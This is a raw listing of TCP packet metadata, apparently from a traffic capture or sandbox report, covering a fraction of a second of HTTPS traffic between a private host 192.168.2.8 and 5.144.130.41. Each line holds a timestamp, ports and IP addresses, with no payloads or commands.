                                      Aug 20, 2024 18:40:08.582622051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.582650900 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582679987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582721949 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.582726955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582758904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583359957 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583524942 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583549023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583574057 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583580971 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583605051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583625078 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.586512089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586535931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586550951 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586586952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.586592913 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586627007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589391947 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589512110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589570045 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589576006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589647055 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589690924 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589864969 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589905977 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589926004 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592490911 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592546940 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.592554092 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592581987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592592001 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.592597008 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592606068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.592648029 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596385002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596447945 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596491098 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596497059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596584082 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596607924 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596626043 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596796989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.596842051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.596900940 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.598818064 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.598845959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.598856926 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.598870039 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.598901987 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.598989964 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.599030972 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.599131107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.601897001 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.601926088 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.601948023 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.601979017 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.602128983 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605573893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605628014 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.605635881 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605798006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605815887 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605835915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.605835915 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605849981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605860949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.605874062 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.605895996 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.605901003 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.607927084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.607961893 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.607980967 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.607985973 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.608010054 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.608016014 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.608053923 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.608061075 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.611948967 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.611972094 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.611982107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.611999035 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.612039089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.613977909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.614031076 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.614043951 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.614092112 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.614824057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.614869118 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.614912033 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.614923954 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.616255999 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.616286039 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.616306067 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.617672920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.617727041 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.617742062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.617773056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.617808104 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.618810892 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.618874073 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.621422052 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.621496916 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.621542931 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.621550083 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.622694016 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.622728109 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.622746944 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.642178059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.642237902 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.642277956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.642294884 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.642333031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.642339945 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.642348051 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.642369986 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.643783092 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.643810034 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.643831015 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.643835068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.643846989 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.643868923 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.643883944 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.647253036 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.647300959 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.647314072 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.647320032 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.647345066 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.647363901 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.663646936 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.663738966 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.663746119 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.663779974 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.669030905 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.669059038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.669095993 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.669097900 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.669107914 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.669125080 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.669148922 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.669229031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.670491934 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.670506001 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.670526981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.670543909 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.670572042 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.670655966 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.671813011 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.671833038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.671860933 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.671868086 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.671902895 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.678056002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678184032 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678200960 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678214073 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678236008 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.678245068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678263903 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.678337097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678350925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678376913 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.678384066 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.678419113 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.678482056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.680630922 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.680670977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.680702925 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.680725098 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.680960894 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.680988073 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.681031942 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.681039095 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.681116104 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.681165934 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.684906006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.684969902 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.684981108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.685014009 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.685306072 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.685343027 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.685380936 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.685390949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.686224937 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.686265945 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.686275005 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.686281919 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.686317921 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.686322927 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.688715935 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.688781023 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.690126896 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.690151930 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.690201044 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.690212011 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.690248966 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.692468882 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.692567110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.692578077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.692620039 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.692641020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.692681074 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.693181038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.693249941 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.693259954 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.693290949 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.693299055 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.693336010 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.696079016 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.696147919 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.696158886 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.696188927 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.696209908 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.696261883 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.696923971 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.696995020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.697041035 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.697047949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.697109938 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.697150946 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.699301958 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.699340105 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.699378014 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.699393988 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.700908899 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.700953007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.700963020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.701055050 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.701066971 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.701090097 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.701097012 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.701128960 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.703536987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.703582048 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.703598022 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.703629017 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.703654051 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.703715086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.704576015 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.704632044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.704670906 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.704684019 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.705038071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.705084085 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.707978964 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.708009005 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.708059072 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.708070993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.708096981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.708151102 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.711039066 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.711055040 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.711066961 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.711129904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.711155891 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.711199999 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.738698006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.738754034 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.738768101 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.738802910 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.739372015 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.739473104 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.739509106 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.739515066 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.740183115 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.740195036 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.740217924 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.740257025 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.740812063 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.740856886 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.740894079 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.740906954 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.741687059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.741717100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.741733074 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.741745949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.741776943 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.741782904 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.745510101 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.745523930 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.745549917 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.745654106 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.750407934 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750443935 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750500917 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.750524044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750591993 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750613928 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750627041 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.750637054 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.750653982 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.757600069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.757628918 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.757642984 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.757654905 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.757671118 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.757689953 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.758027077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.758045912 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.758070946 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.758079052 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.758093119 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.761163950 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.761188030 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.761204004 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.761213064 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.761233091 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.761389971 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.761405945 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.761445999 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.761590004 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767517090 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767546892 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767558098 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.767574072 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767604113 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767622948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767622948 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.767636061 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767647982 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.767657995 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.767677069 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.771226883 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.771311998 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.771357059 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.771470070 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.771511078 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.771545887 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.771557093 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772047043 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772062063 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772082090 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.772090912 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772128105 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.772138119 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772157907 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.772196054 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.772202015 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.776940107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.777002096 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.777013063 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.778214931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.778261900 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.778273106 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.778280020 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.778297901 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.779288054 CEST443624015.144.130.41192.168.2.8
